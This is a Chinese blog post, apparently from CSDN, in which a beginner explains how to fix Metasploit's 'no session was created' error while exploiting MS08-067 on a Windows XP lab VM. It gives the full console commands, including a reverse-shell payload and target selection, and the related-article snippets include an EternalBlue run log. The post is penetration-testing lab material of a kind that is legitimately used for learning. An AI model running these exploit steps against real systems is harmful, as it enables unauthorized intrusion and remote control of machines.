关于使用Metasploit中出现Exploit completed, but no session was created的解决办法

最新推荐文章于 2023-06-13 14:43:07 发布
最新推荐文章于 2023-06-13 14:43:07 发布
阅读量4.1w 收藏 50
点赞数 24
文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430737/article/details/106746682
版权
本文分享了一次利用MS08-067漏洞进行渗透测试的经历,详细记录了在攻击过程中遇到的问题及解决方案,包括正确设置目标靶机版本和语言的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近准备学习有关渗透测试方面的内容,记录一些自己遇见的问题与解决方法,大佬勿喷。

我在做第一个实验:利用ms08-067入侵靶机,获取控制权时,就遇见了下面这个问题:

Exploit completed, but no session was created

Exploit completed, but no session was created我先把我的命令行加上:

msf5 > use /windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RhOSTS 192.168.0.106
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_reverse_tcp 
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.0.102
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

靶机系统为:Windows XP SP3 中文版

经过各方查阅,得出以下解决方法:

1.如果未设置targets,Metaexploit会使用默认的Exploit Target 0

   0   Automatic Targeting

此时要根据靶机版本选择合适的targets,例如这里是靶机系统为:Windows XP SP3 中文版,则只需加一行如下命令

msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34

targets 34

然后输入exploit进行攻击即可

2.把靶机换成Windows XP英文版

结果:
已控制

鄙人刚刚学渗透,才疏学浅。有什么问题,或者我说的有什么错误大家可以在评论区指出。

iJIAHUI
关注
exploit已完成,但没有创建会话exploit completed, but no session was created
08-22 1万+
The "no session was created" message occurs if one of the following happens: 1) The exploit you use doesn't work against the target you selected. Could be the exploit is for a different ve...
MSF漏洞利用完成但无法创建会话的几种原因
热门推荐
慢就是快
12-02 4万+
文章目录1.引言2.原因2.1漏洞payload和目标架构不匹配2.1.1 解决办法2.2 参数LHOST/SRVHOST 配置不当2.2.1 解决办法2.3 使用了NAT模式2.3.1 解决办法2.4存在杀软/EDR终端管理等2.4.1 解决办法2.5漏洞利用模块存在问题2.5.1 解决办法2.6目标已经修复漏洞打了补丁2.6.1 解决办法2.7 防火墙限制2.7.1 解决办法 1.引言 在实际攻防中经常用到一些漏洞模块去测试目标是否存在对应漏洞,比如下列模块: exploit/windows/smb/p
exploit completed, but no session was created
gRpc的博客
08-24 4347
metasploit
使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时出现的exploit completed but no session was created解决办法
xixitaoguliuxian的博客
07-25 1万+
我在使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时,总是出现的exploit completed but no session was created的问题,针对这个现象,我找出了几点可能会导致这个问题出现的原因。 1、被攻击机器的防火墙打开了。 2、下载的vsftpd_2.3.4的默认配置有问题:          a)如果exploit时显示T...
【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击)
05-22 4090
【渗透工具】MSFconsole进阶:exploits(渗透攻击模块)
Metasploit 魔鬼训练营》05 网络服务渗透攻击
kevinhanser
11-07 4593
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. 内存攻防技术 2. MS08-067 攻击案例 3. Oricle 数据库 4. KingView 6.53 HistorySrv 渗透攻击 5. Samba 安全漏洞
[-] Exploit failed: The following options failed to validate: RHOST. [*] Exploit completed, but no session was created.
03-18
### 关于 Metasploit RHOST 验证失败问题的解决方案 当遇到 `RHOST` 验证失败或无法创建会话的情况时,可能的原因包括目标主机不可达、端口未开放、凭证错误或其他配置问题。以下是详细的分析和解决方法: #### 1....
[-] Handler failed to bind to 192.168.8.115:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [-] 192.168.8.169:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (192.168.8.169:445) timed out. [*] Exploit completed, but no session was created.
最新发布
04-03
3. **No session was created** - 尽管完成了整个exploit流程操作,却因为种种原因最终没能够成功建立会话(Session)控制权转移至受害者的环境之中去。 为了进一步诊断这个问题所在位置,则需要更多的上下文信息...
Metasploit使用问题记录及攻击测试代码
Walter的专栏
09-11 1万+
1、利用failwest书中的例子进行测试,执行exploit后提示如下信息,说明 Payload'中的Space过小,增大即可,后面有例子程序可进行测试。 'Payload'        =>                 {                     'Space'    => 300,                     'BadChars' => "\x0
失败的,最详细的进攻MS08-067漏洞的前期准备工作
qq_48818099的博客
05-22 1149
详细失败的MS08-067的漏洞讲解与进攻;
msf6 exploit(windows/smb/ms17_010_eternalblue) > nmap -O 192.168.200.129 [*] exec: nmap -O 192.168.200.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:32 EDT Nmap scan report for 192.168.200.129 Host is up (0.00026s latency). Not shown: 992 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s MAC Address: 00:0C:29:1B:D6:5A (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445 rport => 445 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.200.208:4444 [*] 192.168.200.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.200.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) [*] 192.168.200.129:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.200.129:445 - The target is vulnerable. [-] 192.168.200.129:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets [*] Exploit completed, but no session was created.
03-22
然而,问题出现在最后一步:模块报告“Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets”,说明该漏洞利用模块仅支持64位系统,而目标系统是32位的,因此攻击被中止。...
ms08-067漏洞的复现及所遇到的问题分析
ianTok
10-12 5638
ms08-067
MSF里MS17_010利用模块笔记
zhoumouren88的博客
08-31 582
1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445 smb服务 3. exploit/windows/smb/ms17_010_eternalblue //漏洞利用模块 漏洞利用成功后如图所示,...
ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码
weixin_48710435的博客
08-05 2812
一、实验环境: 1、攻击机:KaliIP:192.168.218.157 1)攻击工具:msf 2)分析工具:wireshark 2、靶 机:Windows7(旗舰版) IP:192.168.218.160 1)开启网络共享(SMB协议) 2)关闭防火墙 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: 1、测试攻击机与靶机的连通性 2.进行MS17-010漏洞扫描 1)启动msf 命令:msfconsole ...
Windows漏洞:MS08-067
Nanyeer的博客
03-21 1771
对MS08-067漏洞(远程命令执行漏洞)的演示
doublepulsar msf 执行报错解决
大哥一声吼
12-03 9233
doublepulsar msf 执行报错解决 在检查服务器是否存在漏洞的过程中,发现exploit 报错, 报错信息如下,已经很明显了 Disable the DefangedMode option if you have authorization to proceed. ,没有正确设置好参数 msf5 exploit(windows/smb/doublepulsar_rce) &g...
Linux 用yum安装软件提示 cannot find a valid baseurl for repo:base/7/x86_64 的解决方法(2024更新)
y2020520的博客
06-13 3万+
出现这个问题是因为yum在安装包的过程中,虽然已经联网,但是没法解析远程包管理库对应的域名,所以我们只需要在网络配置中添加上DNS对应的ip地址即可。DNS2=4.2.2.2表示您正在使用Level 3通信公司的公共DNS服务器,也是全球最大的DNS服务器之一,速度较快且稳定。DNS1=8.8.8.8表示您正在使用Google的公共DNS服务器,这是全球最大的DNS服务器之一,速度较快且稳定。需要注意的是,在某些情况下,您可能需要在DNS服务器的IP地址之间添加一个空行来分隔它们。
metasploit介绍及使用
weixin_43873557的博客
02-07 2万+
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 目录 kali-metasploit框架目录路径: /opt/metasploit-framework/embedded/framework/ /usr/share
评论 22
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值